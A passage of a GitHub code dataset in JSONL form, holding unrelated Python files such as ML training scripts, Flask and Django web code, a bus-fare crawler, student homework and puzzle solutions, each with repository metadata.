min_samples_split_options:\r\n clf = RandomForestClassifier(min_samples_leaf=4,min_samples_split=min_samples_splits,max_features=29,\r\n n_estimators=265,max_depth=50 ,n_jobs=-1,\r\n criterion=\"gini\",oob_score=True,class_weight=\"balanced\",random_state=4,bootstrap=True)\r\n clf.fit(train11_train.iloc[:,0:50],train11_train.iloc[:,50])\r\n q1=clf.predict(train11_test.iloc[:,0:50])\r\n#计算F1得分\r\n score_test = sklearn.metrics.f1_score(train11_test.iloc[:,50], q1, pos_label=list(set(train11_test.iloc[:,50])),average = None)\r\n results1.append((min_samples_splits ,np.mean(score_test)))\r\n#输出最佳参数组合\r\nprint(max(results1, key=lambda x:x[1]))\r\n\r\n ","repo_name":"Gang1997/Astronomy-mining-contest","sub_path":"tune.py","file_name":"tune.py","file_ext":"py","file_size_in_byte":4663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"41734731749","text":"import random\nimport numpy as np\nfrom helper import getCostOfRoute\n\ndef initialize_bat_population(graph, population_size):\n bats = []\n for _ in range(population_size):\n bat = list(range(len(graph)))\n random.shuffle(bat)\n bats.append(bat)\n return bats\n\ndef update_velocity(bats, velocities, best_bat, graph, alpha):\n for i in range(len(bats)):\n velocities[i] = (np.array(velocities[i]) + alpha * (np.array(best_bat) - np.array(bats[i]))).tolist()\n\ndef update_position(bats, velocities):\n for i in range(len(bats)):\n for j in range(len(bats[i])):\n r = random.random()\n if r < abs(velocities[i][j]):\n swap_idx = int((j + abs(velocities[i][j])) % len(bats[i]))\n bats[i][j], bats[i][swap_idx] = bats[i][swap_idx], bats[i][j]\n\ndef local_search(bat, graph):\n i, j = random.sample(range(len(bat)), 2)\n new_bat = bat.copy()\n new_bat[i], new_bat[j] = new_bat[j], new_bat[i]\n if getCostOfRoute(new_bat, graph) < getCostOfRoute(bat, graph):\n return new_bat\n return bat\n\ndef bat_algorithm(graph, population_size, max_iter, alpha):\n bats = initialize_bat_population(graph, population_size)\n velocities = [[0 for _ in range(len(graph))] for _ in range(population_size)]\n best_bat = min(bats, key=lambda x: getCostOfRoute(x, graph))\n\n # Initialize the cost history\n cost_history = []\n\n for _ in range(max_iter):\n update_velocity(bats, velocities, best_bat, graph, alpha)\n update_position(bats, velocities)\n\n for i in range(len(bats)):\n bats[i] = local_search(bats[i], graph)\n\n current_best_bat = min(bats, key=lambda x: getCostOfRoute(x, graph))\n current_best_cost = getCostOfRoute(current_best_bat, graph)\n cost_history.append(current_best_cost)\n\n if current_best_cost < getCostOfRoute(best_bat, graph):\n best_bat = current_best_bat\n\n return best_bat, cost_history","repo_name":"Blaze10/AI","sub_path":"Nature-Inspired Algorithms A Comparative Study/bat_algorithm.py","file_name":"bat_algorithm.py","file_ext":"py","file_size_in_byte":1965,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"31972592462","text":"import core.forms\nimport core.models\nfrom core.views.crud_view_methods import (\n create_methods,\n delete_methods,\n detail_methods,\n list_methods,\n update_methods,\n)\nfrom core.views.crud_view_methods.model_view_generic import (\n GenericDeleteView,\n GenericModelEdit,\n GenericModelList,\n GenericModelView,\n)\nfrom core.views.user_views import SelectLabMixin\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.urls import reverse_lazy\nfrom django.views.generic.detail import DetailView\nfrom django.views.generic.edit import CreateView, DeleteView, FormView, UpdateView\n\n\nclass LoginRequired(LoginRequiredMixin):\n login_url = \"/\"\n redirect_field_name = \"redirect_to\"\n\n\ndef create_list_view(model_name, methods):\n globals()[model_name + \"List\"] = type(\n model_name + \"List\",\n tuple([LoginRequired, SelectLabMixin, GenericModelList]),\n methods,\n )\n\n\ndef create_create_view(model_name, methods):\n globals()[model_name + \"Create\"] = type(\n model_name + \"Create\",\n tuple([LoginRequired, SelectLabMixin, GenericModelEdit, CreateView]),\n methods,\n )\n\n\ndef create_update_view(model_name, methods):\n globals()[model_name + \"Update\"] = type(\n model_name + \"Update\",\n tuple([LoginRequired, SelectLabMixin, GenericModelEdit, UpdateView]),\n methods,\n )\n\n\ndef create_delete_view(model_name, methods):\n globals()[model_name + \"Delete\"] = type(\n model_name + \"Delete\",\n tuple([LoginRequired, SelectLabMixin, GenericDeleteView]),\n methods,\n )\n\n\ndef create_detail_view(model_name, methods):\n globals()[model_name + \"View\"] = type(\n model_name + \"View\",\n tuple([LoginRequired, SelectLabMixin, GenericModelView]),\n methods,\n )\n\n\nfor model_name, methods_list in list_methods.methods.items():\n create_list_view(model_name, methods_list)\n\nfor model_name, methods_list in create_methods.methods.items():\n create_create_view(model_name, methods_list)\n\nfor model_name, methods_list in detail_methods.methods.items():\n create_detail_view(model_name, methods_list)\n\nfor model_name, methods_list in delete_methods.methods.items():\n create_delete_view(model_name, methods_list)\n\nfor model_name, methods_list in update_methods.methods.items():\n create_update_view(model_name, methods_list)\n","repo_name":"darkreactions/ESCALATE","sub_path":"escalate/core/views/crud_views.py","file_name":"crud_views.py","file_ext":"py","file_size_in_byte":2356,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"19"}
+{"seq_id":"32572954732","text":"#!/usr/bin/env python\n#\n# -*- mode:python; sh-basic-offset:4; indent-tabs-mode:nil; coding:utf-8 -*-\n# vim:set tabstop=4 softtabstop=4 expandtab shiftwidth=4 fileencoding=utf-8:\n#\n\nimport sys\nimport suites\nimport unittest\n\n\ndef test_suites():\n allsuites = []\n for s in (\n suites.coding_style,\n suites.shell_docs,\n ):\n allsuites.append(s.test_cases())\n alltests = unittest.TestSuite(allsuites)\n return alltests\n\n\ndef main():\n runner = unittest.TextTestRunner(verbosity=2)\n result = runner.run(test_suites())\n return (len(result.errors) + len(result.failures)) > 0\n\n\nif __name__ == '__main__':\n sys.exit(main())\n","repo_name":"clusto/clusto-apiserver","sub_path":"tests/all.py","file_name":"all.py","file_ext":"py","file_size_in_byte":658,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"}
+{"seq_id":"71279592682","text":"import megabus_request\r\nimport megabus_record\r\nimport megabus_analyze\r\nimport megabus_display\r\nimport megabus_date\r\n\r\n#working database of prices.\r\nweek_days = {\r\n # outbound prices\r\n 'outbound': {\r\n 'monday':[25,23,25],\r\n 'tuesday':[] ,\r\n 'wednesday':[],\r\n 'thursday':[],\r\n 'friday': [],\r\n 'saturday':[],\r\n 'sunday':[],\r\n },\r\n 'inbound':{\r\n 'imonday' : [],\r\n 'ituesday' : [],\r\n 'iwednesday' :[],\r\n 'ithursday' : [],\r\n 'ifriday' : [],\r\n 'isaturday' : [],\r\n 'isunday' :[],}\r\n }\r\n\r\n\r\nmegabus_display.run_mainSpider()\r\n#origin = input('From: ')\r\n#destination = input('Destination: ')\r\ncrawling = megabus_date.Date()\r\ncrawling_date, crawling_day = crawling.format_date(), crawling.day_of_the_week()\r\nurl = megabus_request.format('New York, ny', 'Boston, MA', crawling_date)\r\n\r\n\r\n# Displays a summary of the trip that is being searched\r\n#2megabus.params_message(html)\r\n\r\ndaysSpan = 90\r\n\r\n\r\n# collect data\r\nfor number in range(0,daysSpan):\r\n print(crawling)\r\n if crawling_date == -1:\r\n crawling.increment_month()\r\n daysSpan = daysSpan + 1\r\n continue\r\n outbound = megabus_record.record_trips(url, 'outbound', crawling_day, week_days)\r\n inbound = megabus_record.record_trips(url,'inbound', crawling_day, week_days)\r\n crawling.increment_day()\r\n crawling_day = c\r\n rawling.day_of_the_week()\r\n\r\n# Resets dates to compare data\r\ncrawling = megabus_date.Date()\r\ncrawling_day = crawling.day_of_the_week()\r\ndaysSpan = 90\r\n\r\nfor number in range(0,daysSpan):\r\n if crawling_date == None:\r\n crawling.increment_month()\r\n daysSpan = daysSpan + 1\r\n continue\r\n outbound = megabus_analyze.compare_trip_prices(url, 'outbound', crawling_day, week_days)\r\n inbound = megabus_analyze.compare_trip_prices(url,'inbound', crawling_day, week_days)\r\n crawling.increment_day()\r\n crawling_day = crawling.day_of_the_week()\r\n\r\n\r\n\r\nprint(week_days)\r\n\r\n\r\n# Display\r\n# Request information\r\n# Records information\r\n# Rads information\r\n# Analyze information","repo_name":"GregBorrelly/MegabusWebCrawler","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2103,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"}
+{"seq_id":"38011734000","text":"from flask import Flask, Blueprint, request\nfrom flask_restful import Resource, Api, reqparse\nfrom flask_restful import fields, marshal_with, inputs\n\nfrom app.calculator import FreelanceEntry\n\nfrom .. models import db\n\napi_mod = Blueprint('api', __name__, url_prefix = '/api')\napi = Api(api_mod) # instead of Api(app)\n\ncalculation_row = {\n\t'type' : fields.String,\n\t'hours' :fields.String,\n\t'pay'\t:fields.String,\n\t'rate'\t:fields.String,\n}\n\ncalculation_results = {\n\t'rows' : fields.List(fields.Nested(calculation_row)),\n\t'total_hours' : fields.String,\n\t'total_pay' : fields.String,\n}\n\nparser = reqparse.RequestParser()\n\n# HourlyRate\nparser.add_argument('hours_worked', type=inputs.regex('^[0-9]+$'))\nparser.add_argument('hourly_rate', type=inputs.regex('^[0-9]+$'))\n\n# GuaranteedHours\nparser.add_argument('guaranteed_rate', type=inputs.regex('^[0-9]+$'))\nparser.add_argument('guaranteed_hours', type=inputs.regex('^[0-9]+$'))\nparser.add_argument('actual_hours_worked', type=inputs.regex('^[0-9]+$'))\n\n# for cache = false in ajax get request object (get's around IE's caching)\nparser.add_argument('_', type=str)\n\n\n# Calling parse_args with strict=True ensures that an error is thrown if\n# the request includes arguments your parser does not define.\n# args = parser.parse_args(strict=True)\n\n\nclass Calculation(Resource):\n\t@marshal_with(calculation_results)\n\tdef get(self, calculation_type):\n\t\targs = parser.parse_args(strict = True)\n\t\tif calculation_type == 'hourly_rate':\n\t\t\tentry = FreelanceEntry(\n\t\t\t\thourly_rate = args['hourly_rate'],\n hours = args['hours_worked'],\n ) \n\t\telif calculation_type == 'guaranteed_hours':\n\t\t\tentry = FreelanceEntry(\n\t\t\t\tguaranteed_rate = args['guaranteed_rate'],\n guaranteed_hours = args['guaranteed_hours'],\n hours_worked = args['actual_hours_worked'],\n \t)\n\t\tcalculation = {\n\t\t\t'rows': [],\n\t\t\t'total_hours' : entry.total['hours'],\n\t\t\t'total_pay' : entry.total['pay'],\n\t\t\t}\n\t\tfor time_type in ['regular','overtime','doubletime']:\n\t\t\tcalculation['rows'].append({\n\t\t\t\t'type'\t: time_type,\n\t\t\t\t'hours'\t: getattr(entry,time_type)['hours'],\n\t\t\t\t'pay'\t: getattr(entry,time_type)['pay'],\n\t\t\t\t'rate'\t: getattr(entry,time_type)['rate'],}\n\t\t\t\t)\n\t\t\tprint(calculation['rows'])\n\t\treturn calculation, 201\n\n# Setup the API resource routing here\napi.add_resource(Calculation, '/calc/')\n","repo_name":"Davidthecoolsmartguy/EasyFreelancer","sub_path":"app/mod_api/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":2389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"13775385370","text":"from turtle import Turtle\n\nFONT = (\"Courier\", 24, \"normal\")\n\n\n# displays the current level in the upper left of the screen f\"Level: {level_number}\"\n# and GAME OVER when the gams has ended.\n\nclass Scoreboard(Turtle):\n def __init__(self):\n super().__init__()\n self.color(\"black\")\n self.penup()\n self.hideturtle()\n self.level_number = 0\n self.update_level()\n\n def update_level(self):\n self.clear()\n self.level_number += 1\n self.goto(-230, 260)\n self.write(f\"Level: {self.level_number}\", align=\"center\", font=FONT)\n\n def game_over(self):\n self.goto(0,0)\n self.write(\"GAME OVER\", align=\"center\", font=FONT)\n","repo_name":"waterseeker/100DaysOfCodePython","sub_path":"Day23/scoreboard.py","file_name":"scoreboard.py","file_ext":"py","file_size_in_byte":696,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"36171924726","text":"import os\nfrom flask import Flask\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_login import LoginManager\n\n\ndb = SQLAlchemy()\n\n\ndef create_app():\n\n app = Flask(__name__)\n\n app.config['SECRET_KEY'] = os.getenv(\"SECRET_KEY\")\n app.config['SQLALCHEMY_DATABASE_URI'] = os.getenv(\"SQLALCHEMY_DATABASE_URI\")\n app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n\n db.init_app(app)\n\n login_manager = LoginManager()\n login_manager.login_view = \"auth.login\"\n login_manager.login_message_category = \"danger\"\n login_manager.init_app(app)\n\n from .models import User, Books\n\n @login_manager.user_loader\n def load_user(user_id):\n return User.query.get(int(user_id))\n\n from .main import main as main_blueprint\n app.register_blueprint(main_blueprint)\n\n from .auth import auth as auth_blueprint\n app.register_blueprint(auth_blueprint)\n\n from .book import book as book_blueprint\n app.register_blueprint(book_blueprint)\n\n from .api import api as api_blueprint\n app.register_blueprint(api_blueprint)\n\n with app.app_context():\n db.create_all()\n return app\n","repo_name":"gomezlucas/BookEdx","sub_path":"application/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"73436114604","text":"import pygame, sys, os\nfrom pygame.locals import *\n\n# Content Manager\nclass Content:\n # Builds a Content Manager to a relative path\n def __init__(self, path):\n self.path = path\n\n # Tries to load an image\n # colorkey: -1, (255,255,255), None\n def load_image(self, name, colorkey=None, scale=1,):\n fullname = os.path.join(self.path, name)\n try:\n image = pygame.image.load(fullname)\n except pygame.error(message):\n print(\"Cannot load image:\", name)\n raise SystemExit(message)\n # Apply color key\n image = image.convert()\n if colorkey is not None:\n if colorkey is -1:\n colorkey = image.get_at((0,0))\n image.set_colorkey(colorkey, RLEACCEL)\n \n # Scale image\n if scale == 2:\n image = pygame.transform.scale2x(image)\n elif scale > 2:\n width = image.get_width()* scale\n height = image.get_height() * scale\n image = pygame.transform.smoothscale(image, (width, height)) \n \n return image\n\n # Tries to load a sound\n def load_sound(self, name):\n class NoneSound:\n def play(self): pass\n if not pygame.mixer:\n return NoneSound()\n fullname = os.path.join(self.path, name)\n try:\n sound = pygame.mixer.Sound(fullname)\n except pygame.error(message):\n print(\"Cannot load sound:\", wav)\n raise SystemExit(message)\n return sound\n\n # Loads a set of images\n def load_images(self, array):\n images = []\n for item in array:\n if len(item) == 1:\n images.append(self.load_image(item[0]))\n else:\n images.append(self.load_image(item[0], item[1]))\n return images\n","repo_name":"dacanizares/CafeinaRobot","sub_path":"cafeinagame/content.py","file_name":"content.py","file_ext":"py","file_size_in_byte":1858,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"}
+{"seq_id":"8207195739","text":"# ДЗ*:\n# 1. Написать функцию binary_search, принимающую в качестве входящего\n# параметра элемент для поиска и список в котором необходимо искать.\n# 2. Алгоритм должен искать с помощью двоичного поиска,\n# изображенного на блок-схеме презентации.\n# 3. Функция в итоге должна распечатать результат. Применить 1 раз эту функцию\n# 4. Написать функцию buble_sort или selection_sort,\n# принимающую в качестве входящего параметра не отсортированный список.\n# 5. Алгоритм функции должен сортировать список методом пузырьковой\n# сортировки или методом сортировки выбором.\n# 6. Функция в итоге должна возвращать отсортированный список.\n# Применить 1 раз данную функцию\n\ndef binary_search(spisok, n): \n spisok = [1,2,3,4,5,6,7,8,9,12,17,85,23,28,33,35,39,40,47,46,56,66,67,90]\n left = -1 \n right = len(spisok) \n while right > left + 1: \n middle = (left + right) // 2 \n if spisok[middle] >= n: \n right = middle \n else: \n left = middle \n return right\n\nprint(binary_search(spisok=[1,2,3,4,5,6,7,8,9,12,17,19,23,28,33,35,39,40,47,46,56,66,67,90] , n=40))\n\n\n\n\n\ndef buble_sort (list):\n\n done = False\n while not done:\n done = True\n for i in range(len(list)-1):\n if list[i] > list[i+1]:\n list[i], list[i+1] = list[i+1], list[i]\n done = False\n print(list)\nprint(buble_sort(list = [33,67,23,59,90,77,35,45]))","repo_name":"Aiba0709/Ubuntu","sub_path":"2-курс/homework7/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1896,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"1842230644","text":"# import custom modules\nimport sys\nsys.path.insert(0, \"src/util\")\nsys.path.insert(0, \"src/data_util\")\n\n# imports\nimport torch\nimport torchvision\n\nimport copy\nimport torch.optim as optim\nimport numpy as np\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.utils.checkpoint as cp\nfrom torchvision import datasets, models, transforms\nfrom sklearn.metrics import f1_score\nimport os\n\nfrom nbdt.model import SoftNBDT\nfrom nbdt.model import HardNBDT\nfrom nbdt.loss import SoftTreeSupLoss\nfrom nbdt.loss import HardTreeSupLoss\n\nfrom write_to_json import *\n\ndef train_model(model, dataloaders, criterion, optimizer, num_epochs=25):\n '''\n trains model by using train and validation sets\n '''\n # define lists\n best_model_wts = copy.deepcopy(model.state_dict())\n best_fscore = 0.0\n \n loss_train_evo=[]\n acc_train_evo=[]\n fs_train_evo=[]\n \n loss_val_evo=[]\n acc_val_evo=[]\n fs_val_evo=[] \n \n # Detect if we have a GPU available\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n \n print('---> Begin model training...')\n for epoch in range(num_epochs):\n i = 0\n print('Epoch {}/{}'.format(epoch+1, num_epochs))\n\n # determine if in train or validation phase\n for phase in ['train_snakes_r1', 'valid_snakes_r1']:\n if phase == 'train_snakes_r1':\n model.train() # Set model to training mode\n else:\n model.eval() # Set model to evaluate mode\n \n running_loss = 0.0\n running_corrects = 0\n fscore = []\n\n # iterate over data\n for inputs, labels in dataloaders[phase]:\n inputs = inputs.to(device)\n labels = labels.to(device)\n\n # zero the parameter gradients before beginning backprop\n optimizer.zero_grad()\n\n # forward\n # track history if only in train\n\n with torch.set_grad_enabled(phase == 'train_snakes_r1'):\n # calculate loss from model outputs\n outputs = model(inputs)\n loss = criterion(outputs, labels)\n _, preds = torch.max(outputs, 1)\n\n # backward + optimize only if in training phase\n if phase == 'train_snakes_r1':\n loss.backward()\n optimizer.step()\n\n # statistics\n labels_cpu = labels.cpu().numpy()\n predictions_cpu = preds.cpu().numpy()\n Fscore = f1_score(labels_cpu, predictions_cpu, average='macro')\n fscore.append(Fscore)\n running_loss += loss.item() * inputs.size(0)\n running_corrects += torch.sum(preds == labels.data)\n\n epoch_loss = running_loss / len(dataloaders[phase].dataset)\n epoch_acc = running_corrects.double() / len(dataloaders[phase].dataset)\n epoch_fscore = np.average(np.array(fscore))\n \n print('{} Loss: {:.4f} Acc: {:.4f} F: {:.3f}'.format(phase, epoch_loss, epoch_acc, epoch_fscore))\n \n if phase == 'train_snakes_r1':\n loss_train_evo.append(epoch_loss)\n epoch_acc = epoch_acc.cpu().numpy()\n acc_train_evo.append(epoch_acc)\n fs_train_evo.append(epoch_fscore) \n else:\n loss_val_evo.append(epoch_loss)\n epoch_acc = epoch_acc.cpu().numpy()\n acc_val_evo.append(epoch_acc)\n fs_val_evo.append(epoch_fscore) \n \n # deep copy the model\n if phase == 'valid_snakes_r1' and epoch_fscore > best_fscore:\n best_acc = epoch_acc\n best_model_wts = copy.deepcopy(model.state_dict())\n\n # load best model weights\n model.load_state_dict(best_model_wts)\n \n print(\"---> Finished model training.\")\n \n return model, loss_train_evo, acc_train_evo, fs_train_evo, loss_val_evo, acc_val_evo, fs_val_evo\n\ndef set_parameter_requires_grad(model, feature_extracting):\n '''\n sets the .requires_grad attribute of the parameters in the model to False when we are feature extracting\n '''\n if feature_extracting:\n for param in model.parameters():\n param.requires_grad = False\n \ndef initialize_model(model_name, num_classes, feature_extract, use_pretrained=True):\n '''\n initializes pretrained vgg model\n '''\n print(\"---> Begin model initialization...\")\n ft_extract = False\n if feature_extract == \"True\":\n ft_extract=True\n\n model_ft = models.densenet121(pretrained=use_pretrained)\n set_parameter_requires_grad(model_ft, ft_extract)\n num_ftrs = model_ft.classifier.in_features\n model_ft.classifier = nn.Linear(num_ftrs, num_classes)\n input_size = 224\n\n print(\"---> Finished model initialization.\")\n \n return model_ft, input_size\n\ndef create_dataloaders(DATA_DIR, batch_size, input_size):\n '''\n return model transformations for training and validation sets\n '''\n print(\"---> Begin dataloader creation...\")\n \n data_transforms = {\n 'train_snakes_r1': transforms.Compose([\n transforms.RandomResizedCrop(input_size),\n transforms.RandomHorizontalFlip(),\n transforms.RandomRotation([0, 90]),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n ]),\n 'valid_snakes_r1': transforms.Compose([\n transforms.RandomResizedCrop(input_size),\n transforms.RandomHorizontalFlip(),\n transforms.RandomRotation([0, 90]),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n ]),\n } \n \n # Create training and validation datasets\n image_datasets = {\n x: datasets.ImageFolder(os.path.join(DATA_DIR, x), data_transforms[x]) for x in [\n 'train_snakes_r1',\n 'valid_snakes_r1'] \n }\n \n # Create training and validation dataloaders\n dataloaders_dict = {\n x: torch.utils.data.DataLoader(\n image_datasets[x],\n batch_size=batch_size,\n shuffle=True,\n num_workers=4\n ) for x in [\n 'train_snakes_r1',\n 'valid_snakes_r1'\n ]\n }\n print(\"---> Finished creating dataloaders.\")\n \n return dataloaders_dict, len(image_datasets['train_snakes_r1'].classes)\n\ndef params_to_update(model_ft, feature_extract):\n '''\n defines params to update for optimizer, based on feature extract\n '''\n ft_extract = False\n if feature_extract == \"True\":\n ft_extract=True\n \n params_to_update = model_ft.parameters()\n if ft_extract:\n params_to_update = []\n for name,param in model_ft.named_parameters():\n if param.requires_grad == True:\n params_to_update.append(param)\n # print(\"\\t\",name)\n else:\n for name,param in model_ft.named_parameters():\n if param.requires_grad == True:\n a=1 # print(\"\\t\",name)\n \n return params_to_update\n\ndef run_model(data_cfg, model_cfg, criterion):\n '''\n Runs model based on parameters from data_cfg and model_cfg. Additionally, writes best model's weights to a path in config\n '''\n \n # create dataloaders\n dataloaders_dict, num_classes = create_dataloaders(\n data_cfg['dataDir'],\n model_cfg['batchSize'],\n model_cfg['inputSize']\n )\n \n # Detect if we have a GPU available\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n # Initialize the model for this run\n model_ft, input_size = initialize_model(\n model_cfg['modelName'],\n num_classes,\n feature_extract = model_cfg['featureExtract'],\n use_pretrained=True\n )\n\n model_ft = model_ft.to(device) # make model use GPU\n\n params_update = params_to_update(model_ft, model_cfg['featureExtract'])\n\n # Optimizer\n optimizer_ft = optim.Adam(params_update, lr=model_cfg['lr'])\n \n # train model\n model_ft, loss_train, acc_train, fs_train, loss_val, acc_val, fs_val = train_model(\n model_ft,\n dataloaders_dict,\n criterion,\n optimizer = optimizer_ft,\n num_epochs = model_cfg['nEpochs'])\n \n # save model\n save_model(model_ft, data_cfg, model_cfg)\n \n return model_ft, loss_train, acc_train, fs_train, loss_val, acc_val, fs_val \n \ndef save_model(model_ft, data_cfg, model_cfg):\n '''\n saves weights of a passed model\n '''\n # save model to model states in params\n now = datetime.now().strftime(\"%d%m%Y_%H:%M\")\n model_path = os.path.join(data_cfg['dataDir'], \"model_states\")\n model_name = os.path.join(\n model_path, \n \"{}_{}_{}.pth\".format(\n now,\n model_cfg['nEpochs'],\n model_cfg['modelName']\n )\n )\n if not os.path.isdir(model_path): # make sure model path is made\n print(\"---> Creating {}\".format(model_path))\n os.mkdir(model_path)\n \n # saves model\n print('---> saving model at {}/{}'.format(model_path, model_name))\n torch.save(model_ft.state_dict(), model_name)\n \n \ndef run_nbdt(data_cfg, model_cfg, loss_type):\n '''\n Runs nbdt \n '''\n # check to make sure loss_type is specified\n assert (\n loss_type in [\"SoftTreeSupLoss\", \"HardTreeSupLoss\"]\n ), \"Please specify SoftTreeSupLoss or HardTreeSupLoss\"\n \n # create dataloaders\n dataloaders_dict, num_classes = create_dataloaders(\n data_cfg['dataDir'],\n model_cfg['batchSize'],\n model_cfg['inputSize']\n )\n \n # Detect if we have a GPU available\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n # Initialize the model for this run\n model, input_size = initialize_model(\n model_cfg['modelName'],\n num_classes,\n feature_extract = model_cfg['featureExtract'],\n use_pretrained=True\n ) \n \n # load model weights\n if loss_type == \"SoftTreeSupLoss\":\n model_weights = torch.load(data_cfg['hierarchyModelPath'])\n elif loss_type == \"HardTreeSupLoss\":\n model_weights = torch.load(data_cfg['hierarchyModelPath'])\n \n model = model.to(device) # make model use GPU\n model.load_state_dict(model_weights)\n \n # create NBDT\n print('---> Creating NBDT...')\n if loss_type == \"SoftTreeSupLoss\":\n model = SoftNBDT(\n model = model,\n dataset = 'snakes', \n hierarchy='induced-densenet121',\n path_graph = os.path.join(data_cfg['hierarchyPath'], data_cfg['hierarchyJSON']),\n path_wnids = data_cfg['wnidPath']\n )\n else:\n model = HardNBDT(\n model = model,\n dataset = 'snakes', \n hierarchy='induced-densenet121',\n path_graph = os.path.join(data_cfg['hierarchyPath'], data_cfg['hierarchyJSON']),\n path_wnids = data_cfg['wnidPath']\n )\n print('---> Finished creating NBDT.')\n \n model.eval()\n\n running_corrects = 0\n fscore = []\n\n print('---> Running inference...')\n # iterate over data\n for inputs, labels in dataloaders_dict['valid_snakes_r1']:\n inputs = inputs.to(device)\n labels = labels.to(device)\n\n with torch.no_grad():\n outputs = model(inputs)\n _, preds = torch.max(outputs, 1)\n\n # statistics\n labels_cpu = labels.cpu().numpy()\n predictions_cpu = preds.cpu().numpy()\n Fscore = f1_score(labels_cpu, predictions_cpu, average='macro')\n fscore.append(Fscore)\n running_corrects += torch.sum(preds == labels.data)\n print('---> Finished running inference...')\n \n epoch_acc = running_corrects.double() / len(dataloaders_dict['valid_snakes_r1'].dataset)\n epoch_fscore = np.average(np.array(fscore))\n \n print(\" \")\n print('{} Acc: {:.4f} F1: {:.4f}'.format('NBDT Test', epoch_acc, epoch_fscore))\n print(\" \")","repo_name":"nikolettuce/SnakeClassification_NeuralBackedDecisionTrees","sub_path":"src/model/baseline.py","file_name":"baseline.py","file_ext":"py","file_size_in_byte":12228,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"}
+{"seq_id":"74241585004","text":"# https://py.checkio.org/ru/mission/color-map/\n# my solution\n# not sure if it's the right solution\n\ndef color_map(region):\n n, m, graph, vertices = len(region), len(region[0]), dict(), set()\n for line in region:\n vertices = vertices | set(line)\n for vertex in vertices:\n graph[vertex] = set()\n\n def cell(row, col):\n return region[row][col] if 0 <= row < n and 0 <= col < m else None\n\n def add_edge(v1, v2):\n if v2 is not None and v1 != v2:\n graph[v1].add(v2)\n graph[v2].add(v1)\n\n for i in range(n):\n for j in range(m):\n vertex, right_neighbor, bottom_neighbor = region[i][j], cell(i, j + 1), cell(i + 1, j)\n add_edge(vertex, right_neighbor)\n add_edge(vertex, bottom_neighbor)\n\n def dfs(vert, clr):\n used.add(vert)\n if not colored_vertices[vert] and all((colored_vertices[neighbor] != clr for neighbor in graph[vert])):\n colored_vertices[vert] = clr\n for neighbor in graph[vert]:\n if neighbor not in used:\n dfs(neighbor, clr)\n\n colored_vertices = {vertex: None for vertex in vertices}\n for color in range(1, 5):\n used = set()\n for vertex in vertices:\n if not colored_vertices[vertex]:\n dfs(vertex, color)\n\n return list(colored_vertices.values())\n\n\ndef color_graph(g):\n def dfs(vert, clr):\n used.add(vert)\n if not colored_vertices[vert] and all((colored_vertices[neighbor] != clr for neighbor in g[vert])):\n colored_vertices[vert] = clr\n for neighbor in g[vert]:\n if neighbor not in used:\n dfs(neighbor, clr)\n\n colored_vertices = {vertex: None for vertex in g}\n for color in range(1, 5):\n used = set()\n for vertex in g:\n if not colored_vertices[vertex]:\n dfs(vertex, color)\n\n return list(colored_vertices.values())\n\n\n# best clear solution\n# https://py.checkio.org/mission/color-map/publications/DiZ/python-3/borders/?ordering=most_voted&filtering=all\ndef color_map_bc(colored_map):\n # Construct all regions\n regions = {}\n for i, line in enumerate(colored_map):\n for j, cell in enumerate(line):\n regions.setdefault(cell, set()).add(i + 1j * j)\n\n # Get neighbours for all regions\n neighbours = {}\n for region, cells in regions.items():\n border = set.union(*({c + 1j ** k for k in range(4)} for c in cells)) - cells\n neighbours[region] = {r for r, c in regions.items() if border & c}\n\n # Color each region with first available color\n c, colors = 0, [0] * len(regions)\n while c < len(regions):\n variants = set(range(colors[c] + 1, 5)) - {colors[n] for n in neighbours[c]}\n colors[c] = len(variants) and min(variants)\n c += 2 * bool(variants) - 1\n return colors\n\n\ndef test0():\n v_s = set()\n r = ((5, 2, 3, 1, 1, 1, 1, 1, 1),\n (0, 2, 2, 2, 2, 2, 2, 1, 4),\n (0, 2, 2, 2, 4, 4, 4, 4, 4),\n (0, 6, 6, 7, 8, 8, 8, 8, 8),\n (0, 7, 7, 7, 7, 8, 8, 8, 8))\n\n for rw in r:\n v_s = v_s | set(rw)\n\n print(v_s)\n print(color_map(r))\n\n\ndef test1():\n print(color_map(((0, 0, 0, 1, 4, 4, 4, 4, 4),\n (0, 1, 1, 1, 3, 3, 3, 3, 4),\n (0, 1, 1, 3, 3, 6, 5, 3, 4),\n (1, 1, 1, 3, 2, 6, 5, 5, 9),\n (1, 1, 1, 2, 2, 6, 6, 6, 9),\n (7, 8, 9, 9, 9, 9, 9, 9, 9),\n (7, 8, 8, 8, 8, 8, 8, 8, 8),\n (7, 7, 7, 7, 7, 7, 7, 7, 7))))\n\n regions = ((13, 13, 13, 13, 13, 13, 14, 14, 14, 14,),\n (13, 0, 0, 